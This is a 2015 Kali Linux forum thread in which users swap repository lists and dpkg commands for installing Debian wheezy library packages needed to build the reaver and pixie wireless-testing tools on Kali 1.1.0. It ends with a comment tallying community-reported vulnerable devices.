Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
sudo gedit /etc/apt/sources.list
andCode:
#
# deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150811-08:02]/ sana contrib main non-free
#deb cdrom:[Debian GNU/Linux 2.0 _Sana_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150811-08:02]/ sana contrib main non-free
deb http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb-src http://security.kali.org/kali-security/ sana/updates main contrib non-free
deb-src http://http.kali.org/kali sana main non-free contrib
deb-src http://security.kali.org/kali-security sana/updates main contrib non-free
deb http://http.kali.org/kali sana main non-free contrib
deb http://http.kali.org/kali kali main contrib non-free
deb http://security.kali.org/kali-security kali/updates main contrib non-free
deb http://repository.spotify.com stable non-free
sudo apt-get install linux-headers-$(uname -r)
thanks Laserman75, was afraid that "sudo apt-get install linux-headers-$(uname -r)" would brake my installation since it's not the latest Kali. Same for those "sana" repos I presume? It will all work with KL1.1.0a ??
Edit: I do not want to upgrade to KL2. That is the whole point of reinstalling 1.1.0
Edit2: anyways I've installed manually and everything works beautifully..
https://packages.debian.org/wheezy/libsqlite3-dev and searched for each reaver/pixie dependency 'wheezy' package and downloaded them. Then istalled in that order..
dpkg -i libc6-dev_2.13-38+deb7u8_amd64.deb
dpkg -i libpcap0.8-dev_1.3.0-1_amd64.deb
dpkg -i libpcap-dev_1.3.0-1_all.deb
dpkg -i libsqlite3-0_3.7.13-1+deb7u2_amd64.deb
dpkg -i libsqlite3-dev_3.7.13-1+deb7u2_amd64.deb
dpkg -i libssl1.0.0_1.0.1e-2+deb7u17_amd64.deb
dpkg -i libssl-dev_1.0.1e-2+deb7u17_amd64.deb
Nice to see mon0 again
Last edited by Quest; 2015-10-12 at 20:30.
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
yup set and happy to see 1.1.0
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
strange situation we are in. The good news is; one does not prevent the other. As a main OS though... good luck with that. What were they thinking upstream worry's me abit more... Wish I'd be abit more constructive, but really I'm lost (more than usual).
Kali Linux USB Installation using LinuxLive USB Creator
Howto Install HDD Kali on a USB Key
Clean your laptop fan | basic knowledge
I'd just like to leave a comment here, as of today, November 21, 2015, 56/96 devices reported have been confirmed vulnerable. That's 58.3%! While I assure you this is not real-world accurate as people probably don't report as many failed tests as successful test, these are still some pretty high numbers! If you manage to find more, both vulnerable and not vulnerable, please report here! Thanks! https://docs.google.com/spreadsheets...gid=2048815923